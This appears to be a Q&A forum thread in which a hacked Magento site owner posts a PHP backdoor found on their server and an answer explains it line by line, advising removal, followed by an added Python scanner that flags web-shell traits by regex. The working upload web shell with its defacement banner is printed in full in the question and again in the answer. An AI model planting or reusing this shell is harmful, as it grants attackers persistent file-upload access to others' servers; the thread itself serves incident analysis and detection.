My Magento site got hacked, what is this PHP code doing?

I just found a PHP file on my hosting. With 0.01% knowledge of PHP, can someone explain to me what this code does?

<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"<b>berhasil</b>-->".$_FILES["f"]["name"];
}else{
echo"<b>gagal";}
}
}?>
<title>Hacked by d3b~X</title>
<center>
<div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
<style>
body{overflow:hidden;background-color:black}
#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

+3
1 answer


Code breakdown:

If the variable in the query string has a value (i.e. index.php?ourzr=set):

<?php 
   if(isset($_GET["ourzr"])){


Then display information about the server's operating system using the function php_uname(). They use this information to target the next round of hacks to the specifics of your system.

echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";


Create an HTML form that allows more hack files to be uploaded:

         echo"<form method=post enctype=multipart/form-data>";
         echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";


If a file was uploaded, copy it from the temp folder into the current folder, not under its temporary name but under its original name:

     if($_POST["v"]==up){
             if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
                    echo"<b>sucess</b>-->".$_FILES["f"]["name"];
                }else{
                    echo"<b>failed</b>";
                }
          }
      }
?>


This part is just a little message that says "I am a kool script kiddie from the gang of gangsters.":



<title>Hacked by d3b~X</title>
                            <center>
                                <div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - Index Php
    <style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}


Conclusion:

DELETE THIS FILE ASAP

This script was somehow uploaded to your server with some vulnerability that probably still exists (unless the hacker was good enough to fix it for you).

They found a way to get this one file onto your server where they can access it; now they want to use it to keep uploading scripts and other malicious data. Delete this file and make sure your site does not allow uploading any type of file anywhere.

Next steps:

Read how hackers use file uploads to upload scripts like these and other things they can do with their own upload form: https://www.acunetix.com/websitesecurity/upload-forms-threat/

Read how to create a secure upload script; there are many tutorials.

Learn more about security and try to learn a little php. Let me know if you have more specific questions.

Track down this guy, I think: https://twitter.com/d3b_x

+11
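The answer walks through the five traits that make this file a web shell (a GET-parameter switch, php_uname() fingerprinting, an upload form, a copy() whose destination is the client-supplied filename, and @-suppressed errors). The following scanner, written here as an added example and not part of the question or the answer, turns those traits into regexes and flags PHP files under a webroot that match several of them at once; the SHELL and BENIGN samples are constructed inputs, and the threshold of three hits is an assumed tuning value.

```python
import re
from pathlib import Path
from typing import Dict, List

# Indicators taken from the shell in the question. A legitimate upload
# handler rarely combines more than one or two of these.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    "get_switch": re.compile(r'isset\(\s*\$_GET\['),
    "fingerprint": re.compile(r'php_uname\s*\('),
    "upload_form": re.compile(r'enctype\s*=\s*["\']?multipart/form-data', re.I),
    # copy()/move_uploaded_file() writing to $_FILES[...]["name"], i.e. the
    # attacker picks the destination filename (and thus extension) himself.
    "copy_user_name": re.compile(
        r'(copy|move_uploaded_file)\s*\([^;]*\$_FILES\[[^\]]+\]\[\s*["\']name["\']\s*\]'),
    "error_suppressed": re.compile(r'@\s*(copy|move_uploaded_file|system|exec)\s*\('),
}

HIT_THRESHOLD = 3  # assumed tuning value: report files matching >= 3 indicators


def scan_source(src: str) -> List[str]:
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(src)]


def scan_tree(root: Path) -> Dict[str, List[str]]:
    """Scan every .php/.phtml file under root and report the suspicious ones."""
    report: Dict[str, List[str]] = {}
    for path in root.rglob("*"):
        if path.is_file() and path.suffix.lower() in (".php", ".phtml"):
            hits = scan_source(path.read_text(errors="replace"))
            if len(hits) >= HIT_THRESHOLD:
                report[str(path.relative_to(root))] = hits
    return report


# Constructed sample: the shell from the question, trimmed to its logic.
SHELL = '''<?php if(isset($_GET["ourzr"])){
echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";
echo"<form method=post enctype=multipart/form-data>";
if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){
echo"ok";}}}?>'''

# Constructed sample: an upload handler that chooses its own destination name.
BENIGN = '''<?php
$dest = "/var/uploads/" . bin2hex(random_bytes(16)) . ".dat";
move_uploaded_file($_FILES["f"]["tmp_name"], $dest);'''

if __name__ == "__main__":
    print("shell  :", scan_source(SHELL))
    print("benign :", scan_source(BENIGN))
```

Run scan_tree(Path("/path/to/webroot")) against a copy of the site to list candidate files for manual review; a hit list is a lead, not proof, so inspect each file before deleting it.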